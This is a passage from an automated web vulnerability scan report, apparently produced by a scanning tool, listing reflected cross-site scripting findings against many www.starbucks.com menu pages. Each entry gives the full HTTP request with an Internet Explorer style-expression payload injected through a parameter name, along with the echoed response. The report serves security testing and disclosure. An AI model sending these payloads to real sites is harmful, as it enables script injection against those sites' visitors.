Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:57 GMT
Connection: close
Content-Length: 41263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style="x:expression(alert(1))"080e74fafa0=1"/>
...[SNIP]...

2.203. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ace4c"style="x:expression(alert(1))"ab4d40a17c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:46 GMT
Connection: close
Content-Length: 41042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style="x:expression(alert(1))"ab4d40a17c7=1"/>
...[SNIP]...

2.204. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d51a"style="x:expression(alert(1))"b13ae9964f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:11 GMT
Connection: close
Content-Length: 41086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style="x:expression(alert(1))"b13ae9964f3=1"/>
...[SNIP]...

2.205. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d32a"style="x:expression(alert(1))"fa0c610012d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:35 GMT
Connection: close
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?5d32a"style="x:expression(alert(1))"fa0c610012d=1"/>
...[SNIP]...

2.206. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/8-grain-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d050a"style="x:expression(alert(1))"19e1c1b3a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/8-grain-roll?d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:23 GMT
Connection: close
Content-Length: 44171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/8-grain-roll?d050a"style="x:expression(alert(1))"19e1c1b3a3d=1"/>
...[SNIP]...

2.207. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-bran-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b49f2"style="x:expression(alert(1))"d39bf9c38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/apple-bran-muffin?b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:38 GMT
Connection: close
Content-Length: 44399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-bran-muffin?b49f2"style="x:expression(alert(1))"d39bf9c38f=1"/>
...[SNIP]...

2.208. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-fritter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31dd9"style="x:expression(alert(1))"86ccc93fdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/apple-fritter?31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:02 GMT
Connection: close
Content-Length: 44539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-fritter?31dd9"style="x:expression(alert(1))"86ccc93fdb0=1"/>
...[SNIP]...

2.209. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/asiago-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2958"style="x:expression(alert(1))"253fd2ac0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/asiago-bagel?e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:43 GMT
Connection: close
Content-Length: 44137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/asiago-bagel?e2958"style="x:expression(alert(1))"253fd2ac0e8=1"/>
...[SNIP]...

2.210. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/banana-nut-loaf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 608e6"style%3d"x%3aexpression(alert(1))"50409be2fad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 608e6"style="x:expression(alert(1))"50409be2fad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/banana-nut-loaf?608e6"style%3d"x%3aexpression(alert(1))"50409be2fad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:13 GMT
Connection: close
Content-Length: 42886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/banana-nut-loaf?608e6"style="x:expression(alert(1))"50409be2fad=1"/>
...[SNIP]...

2.211. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/birthday-cake-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36b15"style="x:expression(alert(1))"625aeb76d3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/birthday-cake-mini-doughnut?36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:32 GMT
Connection: close
Content-Length: 43794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut?36b15"style="x:expression(alert(1))"625aeb76d3a=1"/>
...[SNIP]...

2.212. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-oat-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d769"style="x:expression(alert(1))"3750d0b57de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-oat-bar?8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:08 GMT
Connection: close
Content-Length: 43568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar?8d769"style="x:expression(alert(1))"3750d0b57de=1"/>
...[SNIP]...

2.213. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7708"style%3d"x%3aexpression(alert(1))"023b71db86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7708"style="x:expression(alert(1))"023b71db86f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-scone?d7708"style%3d"x%3aexpression(alert(1))"023b71db86f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:53 GMT
Connection: close
Content-Length: 43585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-scone?d7708"style="x:expression(alert(1))"023b71db86f=1"/>
...[SNIP]...

2.214. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-streusel-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4f8c"style="x:expression(alert(1))"3533e46b66c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-streusel-muffin?a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:03 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin?a4f8c"style="x:expression(alert(1))"3533e46b66c=1"/>
...[SNIP]...

2.215. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/butter-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61c60"style="x:expression(alert(1))"78f4d5b41a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/butter-croissant?61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:07 GMT
Connection: close
Content-Length: 43459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/butter-croissant?61c60"style="x:expression(alert(1))"78f4d5b41a5=1"/>
...[SNIP]...

2.216. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cheese-danish

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 720d9"style="x:expression(alert(1))"e96e6a310b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cheese-danish?720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

